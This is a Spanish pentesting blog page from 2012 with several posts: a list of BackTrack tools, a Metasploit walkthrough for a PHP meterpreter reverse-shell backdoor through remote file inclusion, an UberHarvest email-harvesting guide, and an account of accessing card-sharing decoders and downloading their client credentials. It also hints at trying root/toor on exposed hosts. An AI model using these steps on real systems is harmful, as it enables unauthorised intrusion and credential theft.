miércoles, 21 de noviembre de 2012

Cuantas herramientas lleva Backtrack de serie?...

Aquí tienes un listado de herramientas/Descripción incluidas en Backtrack, por si te sirve de referencia. Muchas de ellas comentadas en el popular " proyecto pentest colectivo"
Si pinchas en el nombre de la herramienta, accederás a la web del proyecto.
Gracias por leerme, espero que os guste.

by Christopher Charles Taylor

0Trace 0trace is a traceroute tool which can be run within an existing, open TCP connection - therefore bypassing some types of stateful packet filters with ease.
driftnet   Listens to network traffic and picks out images.
dsniff   Suite of tools for network auditing and penetration testing.
ettercap-gtk  Multi purpose sniffer/interceptor/logger for switched LAN's.
giskismet GISKismet is a wireless recon visualisation tool to represent data gathered using Kismet in a flexible manner. 
hping3 Command-line oriented TCP/IP packet assembler/analyser.
maltego  Reconnaissance software.
netdiscover Active/passive address reconnaissance tool, mainly developed for wireless networks without dhcp server.
skipfish  Fully automated, active web application security reconnaissance tool.
tcpdump Powerful command-line packet analyser.
tcpflow TCP flow recorder.
tcptraceroute  Traceroute implementation using TCP packets.
traceroute  Modern implementation of traceroute for Linux systems.
voipong Utility which detects all Voice Over IP calls on a pipeline.
wireshark Network "sniffer" - a tool that captures and analyses packets off the wire.
arping Broadcasts a who-has ARP packet on the network and outputs the answer.
admsnmp SNMP audit scanner.
amap AMAP is a next-generation scanning tool for assistingnetwork penetration testing.
autoscan   Network scanner, useful for discovering and managing applications.
cisco-ocs      Mass cisco scanner
ciscos Cisco Scanner will scan a range of IP address for Cisco routers that haven't changed their default password of "cisco".
fierce    PERL script that quickly scans domains.
fping A ping-like program which uses the Internet Control Message Protocol (ICMP) echo request to determine if a host is up.
grabber  Web application scanner.
iputils-ping  Suite of tools to test the reachability of network hosts.
iputils-tracepath   Tools to trace the network path to a remote host
lanmap2  Builds database/visualisations of LAN structure from passively sifted information.
nbtscan   Program for scanning IP networks for NetBIOS name information.
nmap NMAP port and vulnerability scanner.
onesixtyone  SNMP scanner and bruteforce tool.
p0f Passive OS fingerprinting tool.
portmap RPC port mapper.
sipscan  Fast network scanner for UDP-SIP clients.
smap Simple scanner for SIP enabled devices.
yersinia    Network tool designed to take advantage of some weakeness in different network protocols.
ace Automated Corporate Enumerator (ACE) is a VoIP enumeration tool that mimics the behavior of an IP Phone.
asleap Demonstrates a serious deficiency in proprietary Cisco LEAP networks.
asp-auditor Look for common misconfigurations and information leaks in ASP.NET applications.
blindelephant    Attempts to discover the version of a (known) web application by comparing static files at known locations against precomputed hashes.
braa    Braa is a tool for making SNMP queries.
copy-router-config    Copies cisco router configuration files using SNMP.
dirbuster  JAVA application designed to brute force directories and files names on web application servers.
dns2tcp     Tool for relaying TCP connections over DNS.
dnsenum      Script for enumerating DNS servers.
dnsmap   Used for information gathering/enumeration phase of infrastructure assessments.
dnsrecon  DNS enumeration script.
dnstracer Determines where a given Domain Name Server (DNS) gets its information from.
ike-scan   Command-line tool that uses the IKE protocol to discover, fingerprint and test IPsec VPN servers.
miranda  Python-based application designed to discover, query and interact with UPNP devices.
httprint    Web server fingerprinting tool.
os-prober Utility to detect other operating systems on a set of drives.
smtp-user-enum Username guessing tool primarily for use against the default Solaris SMTP service.
snmpcheck  Permits to enumerate information via SNMP protocol.
snmpenum Simple perl script to enumerate information on Machines that are running SNMP.
theharvester Tool for gathering e-mail accounts and subdomain names from different public sources.
bed   Designed to check daemons for potential buffer overflows and format strings (as well as other issues).
burpsuite Integrated platform for performing security testing of web applications.
cisco-auditing-tool Perl script which scans cisco routers for common vulnerabilities.
cms-explorer Content Management System (CMS) explorer designed to reveal specific modules, plugins, components and themes of CMS web sites.
mopest  PHP web vulnerability scanner.
nessus   Vulnerability scanner by Tenable.
nikto Open Source (GPL) web server scanner which performs comprehensive tests against web servers.
sipvicious   SIP based VoIP systems auditing tool.
sqlmap  Testing tool that automates the process of detecting and exploiting SQL.
videojak  IP Video security assessment tool.
voiper Allows for extensively and automatiion of testing for VoIP devices for vulnerabilities.
warvox  Suite of tools for exploring, classifying, and auditing telephone systems.
websecurify  Advanced solution to accurately identify web application security issues.
bkhive   Dumps the syskey bootkey from a Windows NT/2K/XP system hive.
chntpw Offline NT password editor.
cmospwd Decrypts password stored in Complementary Metal-Oxide Semi Conductor (CMOS) used to access BIOS SETUP.
eapmd5pass An implementation of an offline dictionary attack against the EAP-MD5 protocol.
fcrackzip   ZIP password cracker, similar to fzc, zipcrack and others.
hashcat    CPU based multihash cracker.
hashcat-utils   Utilities for creating and manipulation wordlists.
hydra Network logon cracker which support many different services.
john  Fast password cracker.
medusa parallel network login auditor
ncrack High-speed network authentication cracking tool.
oclhashcat-lite Very fast single hash GPU based password cracker.
ophcrack Windows password cracker using rainbow tables.
pack Password analys and cracking toolkit.
samdump2   Dumps Windows 2k/NT/XP password hashes.
sipcrack Suite for sniffing and cracking the digest authentification used in the Session Intiation Protocol (SIP) protocol.
thc-pptp-bruter Brute force program against PPTP VPN endpoints (tcp port 1723).
autopsy  Graphical interface to The Sleuth Kit (TSK).
beef-ng Browser Exploitation Framework (BEEF) focuses on leveraging browser vulnerabilities to assess the security posture of a target.
cisco-global-exploiter   Cisco Global Exploiter (CGE) is an advanced, simple and fast security testing tool.
cymothoa     Stealth backdoor tool that injects shellcode into an existing process.
darkmysqli     MySQL injection tool.
framework3 Metasploit Exploitation Framework
mantra     Security framework which can be very helpful in performing all phases of penetration testing.
perl-cisco-copyconfig Provides methods for manipulating the running-config of devices running IOS via SNMP directed TFTP.
sapyto SAP Penetration Testing Framework
set Social-Engineer Toolkit (SET) is a python driven attack framework.
sqlninja Exploits SQL Injection vulnerabilities on web applications using Microsoft SQL.
thc-ipv6 Framework to attack the inherent protocol weaknesses of IPV6.
w3af Web application attack and audit Framework.
wapiti  Web application vulnerability scanner and security auditor.
webslayer   Designed for bruteforcing web applications.
bluediving   Bluediving is a Bluetooth penetration testing suite.
bluemaho     BlueMaho is GUI-shell (interface) for suite of tools for testing security of bluetooth devices.
bluez-hcidump    Analyses Bluetooth Host Controller Interface (HCI) packets.
btscanner BTScanner is designed specifically to extract as much information as possible from a Bluetooth device.
air AIR is a GUI front-end to dd/dc3dd - designed for easily creating forensic images.
bulk-extractor   C++ program that scans a disk image (or any other file) extracting useful information.
dcfldd    Enhanced version of dd for forensics and security.
ddrescue   Similar to dd in that it copies data from one file or block device to another.
fatback  *NIX tool for recovering files from FAT file systems.
galleta   Internet Explorer cookie forensic analysis tool.
pasco Internet Explorer cache forensic analysis tool.
ptk   Computer forensic framework for the command line tools in the SleuthKit.
rkhunter Scans for rootkits, backdoors and local exploits.
sleuthkit (TSK) The Sleuth Kit (TSK) is a collection of forensic command line tools.
vinetto Forensics tool to examine Thumbs.db files.
fragrouter      Network Intrusion Detection (NID) evasion toolkit.
ftester Firewall filtering and Intrusion Detection System (IDS) testing.
snort   Flexible Network Intrusion Detection System (NIDS).
snort-rules-default  Flexible Network Intrusion Detection System (NIDS) ruleset.
snort-common-libraries Flexible Network Intrusion Detection System (NIDS) ruleset.
3Proxy 3Proxy is a lightweight proxy server.
chkrootkit     Designed to check locally for signs of a rootkit.
cpu-checker Evaluates certain CPU (or BIOS) features.
cryptcat   Standard NETCAT enhanced with twofish encryption.
dnswalk  DNS debugger.
gpsd    Global Positioning System - daemon
gpshell     GPshell for Globalplatform
netcat-traditional TCP/IP swiss army knife.
ohrwurm Real-Time Transport Protocol (RTP) fuzzer.
sbd  Secure backdoor NETCAT clone.
socat Alllows for a bi-directional data relay between two independent data channels.
sqlite3 Command line interface for SQLite 3.
stegdetect Automated tool for detecting steganographic content in images.
truecrypt Disk encryption software.
aircrack-ng Aircrack-ng wireless exploitation and enumeration suite.
cowpatty   Cowpatty attacks the WPA/WPA2-PSK exchanges.
freeradius-wpe   A patch for FreeRADIUS implementation to demonstrate RADIUS impersonation. 
kismet   802.11 layer2 wireless network detector, sniffer, and intrusion detection system (IDS).
mdk3  Proof-of-concept tool to exploit common IEEE 802.11 protocol weaknesses using the oslib of aircrack-ng.
rfidiot  Python library for exploring RFID devices.
wepcrack  Open source tool for breaking 802.11 WEP secret keys.
wifitap   Wi-Fi injection tool through tun/tap devices.

martes, 20 de noviembre de 2012

Metasploit...creando backdoor php

Ya hemos hablado varias veces en este blog sobre las virtudes del señor Metasploit con la seria Ex girlfriend.

Hoy vamos a jugar un poco a los indios y vaqueros.
Seguro que conoces los términos LFI (Local File Inclusion) y RFI ( Remote File Inclusion). Una mala configuracion de nuestras aplicaciones y permisos en los servidores web puede ocasionar el acceso local o remoto de un atacante a ciertas rutas en el servidor.
Cuando encontramos dicha vulnerabilidad, tenemos la posibilidad de subir una shell, pero OJO como dejamos esto con nuestros clientes de PenTest, tal y como comentaba el señor Chema Alonso
Podemos subir "la madre de las shell´s", osea, una conexión reversa ( y tenebrosa xD) hacia nuestra máquina metasploit, y usar meterpreter para intentar comprometer el servidor por completo.

Para ello, jugamos con Metasploit y ponemos a la escucha el manejador del payload.
use Multi/handler
set PAYLOAD php/meterpreter/reverser_tcp
set LHOST ip local ( no pongas como en todos los manuales si quieres probarlo hacia fuera, el mundo real xD )
Exploit -z -j

ya tenemos el payload a la escucha. Como no hemos configurado LPORT, por defecto estamos escuchando sobre el puerto 4444.  (***aunque no tenga nada que ver, habéis probado a escanear máquinas con este puerto abierto+ ssh y probar a entrar con u:root/p:toor ? ***)

Ahora vamos a crear la shell.

Como veis, inicio también el servidor apache, que hará las veces de servidor vulnerable a RFI.

En cualquier equipo, entramos a la dirección del servidor, en este caso de demo,
y ya tenemos sesión en meterpreter.

Como podéis ver, la sesión meterpreter haciendo uso de SHELL nos muestra acceso a la ruta del backdoor/shell.
Para estas pruebas he usado el usuario root para arrancar el servicio de apache, entonces, cualquier persona que acceda a dicha shell, tendrá acceso completo a todo el sistema, o al menos a la parte del root xD. Un ejemplo gráfico de la necesidad de correr los servicios con usuarios pelados, y el uso de ACL´s a nivel de disco para evitar estos incidentes. También sería interesante correr el Apache en modo Jail (like freebsd) para aislar no solo permisos, sino comandos del sistema por ejemplo. No confíes solo en el Htaccess...

Como siempre, gracias por leerme !!!

domingo, 18 de noviembre de 2012

TURNkey... el badoo de las máquinas virtuales

Seguro que todos los días lees información de vulnerabilidades sobre "empaquetados" como wordpress, joomla, drupal, etc etc etc. Muchas veces nos entra la pereza a la hora de montar una máquina virtual con todo el "software que corre por debajo" como son los servidores web, bbdd, aplicaciones, ficheros o incluso el sistema operativo.
La gente de TURNKEY nos pone a disposición toda una seria de VMachines listas para andar con todo tipo de "empaquetados".
No creo que sea muy recomendable montar ninguna de estas máquinas para su uso en producción, pero si lo que quieres es jugar o romperlas xD, sin duda es una opción muy cómoda.
Espero que disfrutéis mucho con estas máquinas.

Por otro lado, recordar que tengo puesto en marcha la página para el proyecto de pentest colectivo  donde estoy recopilando artículos que considero interesantes, en CASTELLANO, para realizar las pruebas de intrusión que tanto nos gustan.
Si quieres aparecer, si quieres desaparecer, si tienes algún post por ahí escondido el cual revisas cuando haces tus auditorías.. Te animo a que participes.

gracias a todos por leerme !!! buen domingo !!!!
si lees esto el lunes, es que SI pasaste un buen domingo lejos de la informática xD.

viernes, 16 de noviembre de 2012

Uberharvest...olfateandooooo webs

Hace un tiempo que publiqué la entrada sobre Harvester para "cosechar" correos en el world wide web xD

Hoy voy a hablaros de UberHarvest. La madre del cordero, compralo !!!
Ubicado en una ruta un tanto peculiar en Backtrack 5 r3

- Busca de direcciones de correo electrónico desde un sitio web o muchos a la vez
- Consigue sitio web de destino del nombre de dominio, IP del dominio y la ubicación geográfica
- Scan sitio web de destino para el correo de Exchange (MX) Dirección de servidores IP.
- Probar si los servidores de destino MX son open-relay server
- Obtener la versión del servidor web de destino y X-Powered-por de la cabecera
- Información Harvest usando técnicas de evasión a través del uso de proxy anónimo y los diferentes agentes de usuario.
- Obtener los dominios de destino del servidor del motor de búsqueda Google
- Utilice la flecha hacia arriba para reutilizar entrada antigua para aumentar la eficiencia del tiempo
- Imprima los resultados en formato XML y XSL hojas de estilo.
- Cosecha de los números de teléfono de la página web principal y consulte con Amarillo-Pages.com por teléfono listado, la dirección y el nombre del negocio.
- Obtener certificados Secure Socket Layer información.
- Recibir información de WHOIS
- Recibir información ARIN
- Utilice Google para excavar en busca de más vínculos en caché
- Huella WordPress Blogs
- Huella Drupal Blogs

Vamos a tocar el piano. uberharvest -u lo primero de todo para actualizarlo. No actualiza bien desde la linea de comandos, creo que por un problema con la ruta de la carpeta de destino, por lo que me ha tocado bajarme el tar y volver a instalarlo.
 bzip2 -cd uberharvest.tar.bz2 | tar xvf -

uberharvest -m   nos lanza un menú interactivo, cada vez mas cerca el mundo linux de los wizards de windows xD. Si queremos usar un proxy anti-jail xD podemos añadir -p ip. Si queremos despistar un poco mas a la víctima, podemos añadir el parámetro -random para cambiar los user-agents ( la identificación de los navegadores para que los servidores web puedan manejar ciertos comportamientos, por ejemplo, cuando entras desde un móvil a una web, que se abre en modo "mobile").

Empieza preguntándonos la url víctima.

Las preguntas son muy obvias, encontrar correos con @ el dominio dado, o cualquier correo. Guardar a disco o salida por pantalla. Buscar solo en la web del dominio pasado, o que aplique recursividad y busque a su vez en los dominios encontrados (hasta donde llegará? hasta el infinito) pero nos pregunta.
Como he empezado el post, también nos muestra los datos del servidor.

Otra opción para mi interesante sin duda es la posibilidad de pasarle un fichero con direcciones "víctima". cambiamos al directorio "vault" y editamos el fichero website.txt. Para usarlo basta con llamar al programa con el modificador -l. También podemos indicarle que nos tire los resultados a un fichero xml formateado.

 Espero que os guste y como siempre, gracias por leerme !!!.

lunes, 12 de noviembre de 2012

Hackers hackeados...Card Sharing

No es tan abochornante como lo que comentaba el maligno en su post sobre un Hacker ruso pillado por la webcam pero me hace gracia que la gente se meta donde no le llaman, con acciones ilegales.

El asunto es muy sencillo. Imagino que muchos conocéis la "técnica" de Card Sharing. No voy a profundizar sobre este tema, ya que es ilegal, y me parece poco decoroso hablar sobre esto aquí. Aunque no lo creais, aquí se habla de inseguridad para conseguir seguridad...
A grandes rasgos, el Card Sharing esta basado en que un cliente de alguna plataforma de contenidos digitales, como puede ser Digital + con su tarjeta de claves (keys) y un deco, generalmente Dreambox ( basado en linux) comparte las claves de encriptación con equipos por internet. Es decir, que un amigo paga la cuota, y comparte claves con n amigos. Hay incluso gente que te ofrece por una cuota baja, 10 €, conectarte a dicho decodificador con todos los canales disponibles. Me parece patético esto, ya que piratear por ver la tele...

Entonces, por qué os hablo de esto? porque la gente lo monta y no tiene ni idea.
Lo típico, gente que se mete a manifacero, lee un manual, y como no le anda muy bien, deja lo de cambiar las claves para luego.

Es curioso que buscando en 4096 equipos en rangos de direcciones, la mayoría de Polonia, no encontré más que 1 decodificador. Puede que le hayan cambiado los puertos, cosa recomendable si lo usas, pero lo dudo.
Sin embargo, con ese mismo número de equipos en España, había más de 100 equipos. Así nos va en España, somos unos piratas ( pero no de los buenos, de los que hacen daño a la Industria...)

Como se detectan estos aparatos, pues suelen estar configurados para atender comunicaciones servidor/cliente mediante el puerto 160001 y en algunos decos 12000. Si a esto le sumamos la posibilidad de que tengan el ftp del decodificador publicado en la dmz, o redirigido, pues ya podemos probar.

Como podéis ver en esta imagen, como no toman las medidas de seguridad oportunas cuando se publican/ofrecen servicios en Internet, puedo ver los nombre de usuarios e ip de los clientes conectados, incluso el canal que están viendo en ese momento.

Si seguimos profundizando, nos metemos en el ftp del dreambox del servidor, y descargamos el fichero de configuración con todas las ip´s, usuarios y claves de los clientes.

De esta manera, podríamos configurar nuestro decodificador para obtener estos servicios gratuitamente.
Es curioso porque como la mayoría de los mortales tienen ip´s dinámicas, usan servicios de dns gratuitos tipo dyndns y demás, por lo que haciendo google hacking con esos nombres de dominios, podemos incluso geolocalizar la vivienda del "juacker".

Entonces, con ip´s de gente que comete las infracciones, con ip de la persona que se lucra con esto, no hay nadie que investigue esto. Luego si tu asesoras a una empresa sobre vulnerabilidades, si no caes en gracia, se te cae el pelo ( para los que aún os queda !!!). La vida es así.

Como siempre, gracias por leerme, y espero que no pirateéis esos servicios, y si lo hacéis, lo hagáis bien.
Como siempre, cambiar puertos, técnica anti-fingerprint ( borrar el banner del ftp? ) y sobre todo, USUARIOS Y CONTRASEÑAS ROBUSTAS !!!.

PD: Después de varios comentarios, quiero añadir otro post de la gente de Security By Default de hace unos años, en el que también mencionaban este asunto, pero realizaban las búsquedas por Shodan.
http://www.securitybydefault.com/2010/08/pirateando-al-pirata-television-de-pago.html Google +